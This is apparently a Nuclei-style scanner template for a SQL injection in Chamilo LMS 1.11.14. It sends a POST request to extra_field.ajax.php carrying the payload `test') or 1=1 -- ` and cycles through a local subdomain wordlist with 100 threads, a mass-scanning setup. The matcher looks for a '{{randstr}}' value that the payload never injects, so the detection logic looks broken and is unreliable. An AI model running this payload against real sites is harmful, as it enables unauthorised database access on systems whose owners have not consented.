id: chamilo-lms-sqli 2
info:
  author: undefl0w
  name: Chamilo LMS SQL Injection
  severity: high
  description: Finds sql injection in Chamilo version 1.11.14
  tags: chamilo,sqli

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Content-Type: application/x-www-form-urlencoded

        type=image&field_id=image&tag=image&from=image&search=image&options=["test') or 1=1 -- "]
    matchers:
      - type: word
        words:
          - "{{randstr}}"
        part: body